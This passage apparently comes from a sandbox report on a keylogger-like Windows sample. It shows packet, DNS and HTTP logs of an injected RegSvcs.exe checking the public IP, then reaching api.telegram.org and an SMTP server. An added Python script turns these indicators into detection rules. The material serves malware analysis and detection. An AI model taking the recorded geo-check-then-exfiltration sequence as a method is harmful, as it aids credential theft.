Jan 14, 2025 16:57:44.909703016 CET  49946  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:44.910406113 CET  49946  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:44.914411068 CET  49941  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:44.915117979 CET  49952  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:44.919543982 CET  80     49941  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:44.920008898 CET  80     49952  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:44.920072079 CET  49941  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:44.920093060 CET  49952  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:44.920208931 CET  49952  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:44.924936056 CET  80     49952  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:45.620203018 CET  80     49952  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:45.622569084 CET  49958  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:45.622622967 CET  443    49958  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:45.622693062 CET  49958  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:45.622934103 CET  49958  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:45.622946978 CET  443    49958  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:45.675263882 CET  49952  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:46.087726116 CET  443    49958  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:46.089415073 CET  49958  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:46.089448929 CET  443    49958  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:46.229388952 CET  443    49958  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:46.229459047 CET  443    49958  104.21.96.1      192.168.2.10
Jan 14, 2025 16:57:46.229538918 CET  49958  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:46.229979038 CET  49958  443    192.168.2.10     104.21.96.1
Jan 14, 2025 16:57:46.240256071 CET  49952  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:46.240608931 CET  49962  443    192.168.2.10     149.154.167.220
Jan 14, 2025 16:57:46.240653992 CET  443    49962  149.154.167.220  192.168.2.10
Jan 14, 2025 16:57:46.241091013 CET  49962  443    192.168.2.10     149.154.167.220
Jan 14, 2025 16:57:46.241610050 CET  49962  443    192.168.2.10     149.154.167.220
Jan 14, 2025 16:57:46.241624117 CET  443    49962  149.154.167.220  192.168.2.10
Jan 14, 2025 16:57:46.245212078 CET  80     49952  132.226.247.73   192.168.2.10
Jan 14, 2025 16:57:46.245484114 CET  49952  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:46.848349094 CET  443    49962  149.154.167.220  192.168.2.10
Jan 14, 2025 16:57:46.848414898 CET  49962  443    192.168.2.10     149.154.167.220
Jan 14, 2025 16:57:46.850178003 CET  49962  443    192.168.2.10     149.154.167.220
Jan 14, 2025 16:57:46.850183964 CET  443    49962  149.154.167.220  192.168.2.10
Jan 14, 2025 16:57:46.850418091 CET  443    49962  149.154.167.220  192.168.2.10
Jan 14, 2025 16:57:46.852129936 CET  49962  443    192.168.2.10     149.154.167.220
Jan 14, 2025 16:57:46.895327091 CET  443    49962  149.154.167.220  192.168.2.10
Jan 14, 2025 16:57:47.106307030 CET  443    49962  149.154.167.220  192.168.2.10
Jan 14, 2025 16:57:47.106393099 CET  443    49962  149.154.167.220  192.168.2.10
Jan 14, 2025 16:57:47.106442928 CET  49962  443    192.168.2.10     149.154.167.220
Jan 14, 2025 16:57:47.109121084 CET  49962  443    192.168.2.10     149.154.167.220
Jan 14, 2025 16:57:54.785693884 CET  49901  80     192.168.2.10     132.226.247.73
Jan 14, 2025 16:57:54.929533958 CET  50011  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:54.934354067 CET  587    50011  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:54.934691906 CET  50011  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:55.498307943 CET  587    50011  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:55.498743057 CET  50011  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:55.503786087 CET  587    50011  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:55.753878117 CET  587    50011  208.91.199.225   192.168.2.10
Jan 14, 2025 16:57:55.754164934 CET  50011  587    192.168.2.10     208.91.199.225
Jan 14, 2025 16:57:55.759052038 CET  587    50011  208.91.199.225   192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:55.909369946 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:55.909801006 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:55.914573908 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.066633940 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.067053080 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.074301958 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.215243101 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.216193914 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.221044064 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.388755083 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.393136978 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.398363113 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.540721893 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.551135063 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.551135063 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.551393032 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.551393986 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.551393986 CET50011587192.168.2.10208.91.199.225
                                                                                                                  Jan 14, 2025 16:57:56.556617975 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.556653023 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.556705952 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.556735039 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.556762934 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.897588968 CET58750011208.91.199.225192.168.2.10
                                                                                                                  Jan 14, 2025 16:57:56.956842899 CET50011587192.168.2.10208.91.199.225
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Jan 14, 2025 16:57:17.448195934 CET  51953        53         192.168.2.10     1.1.1.1
Jan 14, 2025 16:57:17.455282927 CET  53           51953      1.1.1.1          192.168.2.10
Jan 14, 2025 16:57:18.419682980 CET  63255        53         192.168.2.10     1.1.1.1
Jan 14, 2025 16:57:18.426973104 CET  53           63255      1.1.1.1          192.168.2.10
Jan 14, 2025 16:57:31.371951103 CET  63379        53         192.168.2.10     1.1.1.1
Jan 14, 2025 16:57:31.378680944 CET  53           63379      1.1.1.1          192.168.2.10
Jan 14, 2025 16:57:40.794367075 CET  63324        53         192.168.2.10     1.1.1.1
Jan 14, 2025 16:57:40.802177906 CET  53           63324      1.1.1.1          192.168.2.10
Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                      Type            Class        DNS over HTTPS
Jan 14, 2025 16:57:17.448195934 CET  192.168.2.10  1.1.1.1  0xb244    Standard query (0)  checkip.dyndns.org        A (IP address)  IN (0x0001)  false
Jan 14, 2025 16:57:18.419682980 CET  192.168.2.10  1.1.1.1  0x315d    Standard query (0)  reallyfreegeoip.org       A (IP address)  IN (0x0001)  false
Jan 14, 2025 16:57:31.371951103 CET  192.168.2.10  1.1.1.1  0x4b36    Standard query (0)  api.telegram.org          A (IP address)  IN (0x0001)  false
Jan 14, 2025 16:57:40.794367075 CET  192.168.2.10  1.1.1.1  0x8210    Standard query (0)  us2.smtp.mailhostbox.com  A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name                                           CName                                 Address          Type                    Class        DNS over HTTPS
Jan 14, 2025 16:57:08.452882051 CET  1.1.1.1    192.168.2.10  0x701c    No error (0)  shed.dual-low.s-part-0017.t-0009.t-msedge.net  azurefd-t-fb-prod.trafficmanager.net  -                CNAME (Canonical name)  IN (0x0001)  false
Jan 14, 2025 16:57:08.452882051 CET  1.1.1.1    192.168.2.10  0x701c    No error (0)  dual.s-part-0017.t-0009.fb-t-msedge.net        s-part-0017.t-0009.fb-t-msedge.net    -                CNAME (Canonical name)  IN (0x0001)  false
Jan 14, 2025 16:57:08.452882051 CET  1.1.1.1    192.168.2.10  0x701c    No error (0)  s-part-0017.t-0009.fb-t-msedge.net             -                                     13.107.253.45    A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:17.455282927 CET  1.1.1.1    192.168.2.10  0xb244    No error (0)  checkip.dyndns.org                             checkip.dyndns.com                    -                CNAME (Canonical name)  IN (0x0001)  false
Jan 14, 2025 16:57:17.455282927 CET  1.1.1.1    192.168.2.10  0xb244    No error (0)  checkip.dyndns.com                             -                                     132.226.247.73   A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:17.455282927 CET  1.1.1.1    192.168.2.10  0xb244    No error (0)  checkip.dyndns.com                             -                                     132.226.8.169    A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:17.455282927 CET  1.1.1.1    192.168.2.10  0xb244    No error (0)  checkip.dyndns.com                             -                                     193.122.130.0    A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:17.455282927 CET  1.1.1.1    192.168.2.10  0xb244    No error (0)  checkip.dyndns.com                             -                                     158.101.44.242   A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:17.455282927 CET  1.1.1.1    192.168.2.10  0xb244    No error (0)  checkip.dyndns.com                             -                                     193.122.6.168    A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:18.426973104 CET  1.1.1.1    192.168.2.10  0x315d    No error (0)  reallyfreegeoip.org                            -                                     104.21.96.1      A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:18.426973104 CET  1.1.1.1    192.168.2.10  0x315d    No error (0)  reallyfreegeoip.org                            -                                     104.21.64.1      A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:18.426973104 CET  1.1.1.1    192.168.2.10  0x315d    No error (0)  reallyfreegeoip.org                            -                                     104.21.16.1      A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:18.426973104 CET  1.1.1.1    192.168.2.10  0x315d    No error (0)  reallyfreegeoip.org                            -                                     104.21.32.1      A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:18.426973104 CET  1.1.1.1    192.168.2.10  0x315d    No error (0)  reallyfreegeoip.org                            -                                     104.21.112.1     A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:18.426973104 CET  1.1.1.1    192.168.2.10  0x315d    No error (0)  reallyfreegeoip.org                            -                                     104.21.48.1      A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:18.426973104 CET  1.1.1.1    192.168.2.10  0x315d    No error (0)  reallyfreegeoip.org                            -                                     104.21.80.1      A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:31.378680944 CET  1.1.1.1    192.168.2.10  0x4b36    No error (0)  api.telegram.org                               -                                     149.154.167.220  A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:40.802177906 CET  1.1.1.1    192.168.2.10  0x8210    No error (0)  us2.smtp.mailhostbox.com                       -                                     208.91.199.225   A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:40.802177906 CET  1.1.1.1    192.168.2.10  0x8210    No error (0)  us2.smtp.mailhostbox.com                       -                                     208.91.199.223   A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:40.802177906 CET  1.1.1.1    192.168.2.10  0x8210    No error (0)  us2.smtp.mailhostbox.com                       -                                     208.91.198.143   A (IP address)          IN (0x0001)  false
Jan 14, 2025 16:57:40.802177906 CET  1.1.1.1    192.168.2.10  0x8210    No error (0)  us2.smtp.mailhostbox.com                       -                                     208.91.199.224   A (IP address)          IN (0x0001)  false
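Read together, the DNS, TCP and HTTP records of this run form one sequence: the injected RegSvcs.exe (PID 7804) first learns the victim's public IP from checkip.dyndns.org and reallyfreegeoip.org, then opens a TLS session to api.telegram.org (149.154.167.220:443) and an SMTP session to us2.smtp.mailhostbox.com (208.91.199.225:587). That ordering, plus an IE6/.NET CLR 1.0 User-Agent on a modern host, is what a detection should key on rather than any single hostname. The script below is an added example, not Joe Sandbox output or code: its event records are constructed from the values shown in this report, and the record layout, rule names, the 60-second correlation window and the LOLBin/IP-lookup host lists are this example's own assumptions.

```python
"""Correlate sandbox network events into the keylogger geo-check -> exfil pattern.

Added example; not part of the Joe Sandbox report. The event tuples are
constructed from values visible in the report (timestamps, hosts, ports,
PID/process path, User-Agent). Field layouts, indicator lists and the
correlation window are assumptions made for this example.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# --- constructed input: values from the report, structure is this script's own ---
DNS_QUERIES = [  # (timestamp, queried name)
    ("2025-01-14 16:57:17.448", "checkip.dyndns.org"),
    ("2025-01-14 16:57:18.419", "reallyfreegeoip.org"),
    ("2025-01-14 16:57:31.371", "api.telegram.org"),
    ("2025-01-14 16:57:40.794", "us2.smtp.mailhostbox.com"),
]
HTTP_REQUESTS = [  # (timestamp, pid, process image, Host header, User-Agent header)
    ("2025-01-14 16:57:17.481", 7804,
     r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "checkip.dyndns.org",
     "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"),
]
TCP_CONNECTIONS = [  # (timestamp, src ip, dst ip, dst port); client-side first packet only
    ("2025-01-14 16:57:46.848", "192.168.2.10", "149.154.167.220", 443),
    ("2025-01-14 16:57:54.929", "192.168.2.10", "208.91.199.225", 587),
]

# --- indicator lists (assumptions, seeded from the hosts this sample contacted) ---
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "checkip.dyndns.com", "reallyfreegeoip.org"}
TELEGRAM_API = "api.telegram.org"
SMTP_PORTS = {25, 465, 587}
# .NET framework utilities that never need to speak HTTP on their own.
DOTNET_LOLBINS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
# IE5/IE6 UA claiming .NET CLR 1.x, as seen in the report's HTTP session.
LEGACY_UA = re.compile(r"MSIE [56]\.0;.*\.NET CLR ?1\.")


def ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


@dataclass
class Finding:
    when: str
    rule: str
    detail: str


def check_http(requests) -> list[Finding]:
    """Flag IP-lookup requests issued by .NET LOLBins and any legacy IE6/.NET 1.x UA."""
    out: list[Finding] = []
    for when, pid, image, host, ua in requests:
        exe = image.rsplit("\\", 1)[-1].lower()
        if host in IP_LOOKUP_HOSTS and exe in DOTNET_LOLBINS:
            out.append(Finding(when, "ip-lookup-from-lolbin", f"{exe} (pid {pid}) -> {host}"))
        if LEGACY_UA.search(ua):
            out.append(Finding(when, "legacy-dotnet-ua", f"{exe} UA={ua!r}"))
    return out


def check_exfil_chain(dns, tcp, window: timedelta = timedelta(seconds=60)) -> list[Finding]:
    """After the first IP-lookup DNS query, look for Telegram API and SMTP activity
    inside the window; the geo-check followed by an exfil channel is the pattern."""
    out: list[Finding] = []
    lookups = [ts(t) for t, name in dns if name in IP_LOOKUP_HOSTS]
    if not lookups:
        return out
    start = min(lookups)

    def within(t: str) -> bool:
        return start <= ts(t) <= start + window

    for t, name in dns:
        if name == TELEGRAM_API and within(t):
            delta = (ts(t) - start).total_seconds()
            out.append(Finding(t, "telegram-api-after-ip-lookup", f"DNS {name} {delta:.0f}s after lookup"))
    for t, src, dst, port in tcp:
        if port in SMTP_PORTS and within(t):
            delta = (ts(t) - start).total_seconds()
            out.append(Finding(t, "smtp-after-ip-lookup", f"{src} -> {dst}:{port} {delta:.0f}s after lookup"))
    return out


def analyse(dns=DNS_QUERIES, http=HTTP_REQUESTS, tcp=TCP_CONNECTIONS) -> list[Finding]:
    return check_http(http) + check_exfil_chain(dns, tcp)


if __name__ == "__main__":
    for f in analyse():
        print(f"{f.when}  {f.rule:<30} {f.detail}")
```

Run against the constructed events, the script raises four findings: the LOLBin IP lookup, the legacy User-Agent, the Telegram API resolution about 14 seconds after the lookup, and the SMTP connection about 37 seconds after it. The TLS flow to 149.154.167.220:443 is deliberately not flagged on its own, since port 443 to Telegram is also normal desktop-client traffic; it only becomes interesting in combination with the preceding IP lookup from a process that should never make HTTP requests.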
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.10  49754        132.226.247.73  80                7804  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 14, 2025 16:57:17.481364965 CET  151                OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 14, 2025 16:57:18.147962093 CET  273                IN
    HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 15:57:18 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 16:57:18.155138016 CET  127                OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jan 14, 2025 16:57:18.363883018 CET  273                IN
    HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 15:57:18 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 14, 2025 16:57:19.126864910 CET  127                OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jan 14, 2025 16:57:19.335119963 CET  273                IN
    HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 15:57:19 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.10  49772        132.226.247.73  80                7804  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 14, 2025 16:57:20.024249077 CET  127                OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Jan 14, 2025 16:57:20.701334953 CET  273                IN
    HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 15:57:20 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.10  49779        132.226.247.73  80                7804  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 14, 2025 16:57:21.333246946 CET  151                OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 14, 2025 16:57:22.035029888 CET  273                IN
    HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 15:57:21 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.10  49791        132.226.247.73  80                7804  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 14, 2025 16:57:22.668600082 CET  151                OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 14, 2025 16:57:23.380018950 CET  273                IN
    HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 15:57:23 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.10  49800        132.226.247.73  80                7804  C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                            Bytes transferred  Direction  Data
Jan 14, 2025 16:57:24.265418053 CET  151                OUT
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Jan 14, 2025 16:57:24.957489967 CET  273                IN
    HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 15:57:24 GMT
    Content-Type: text/html
    Content-Length: 104
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP    | Source Port | Destination IP  | Destination Port | PID  | Process
5          | 192.168.2.10 | 49814       | 132.226.247.73  | 80               | 7804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 14, 2025 16:57:25.611735106 CET | 151               | OUT       | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 14, 2025 16:57:26.291223049 CET | 273               | IN        | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:26 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP    | Source Port | Destination IP  | Destination Port | PID  | Process
6          | 192.168.2.10 | 49827       | 132.226.247.73  | 80               | 7804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 14, 2025 16:57:26.924217939 CET | 151               | OUT       | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 14, 2025 16:57:27.662666082 CET | 273               | IN        | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:27 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP    | Source Port | Destination IP  | Destination Port | PID  | Process
7          | 192.168.2.10 | 49838       | 132.226.247.73  | 80               | 7804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp                           | Bytes transferred | Direction | Data
Jan 14, 2025 16:57:28.346054077 CET | 151               | OUT       | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 14, 2025 16:57:30.000355005 CET | 273               | IN        | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:28 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
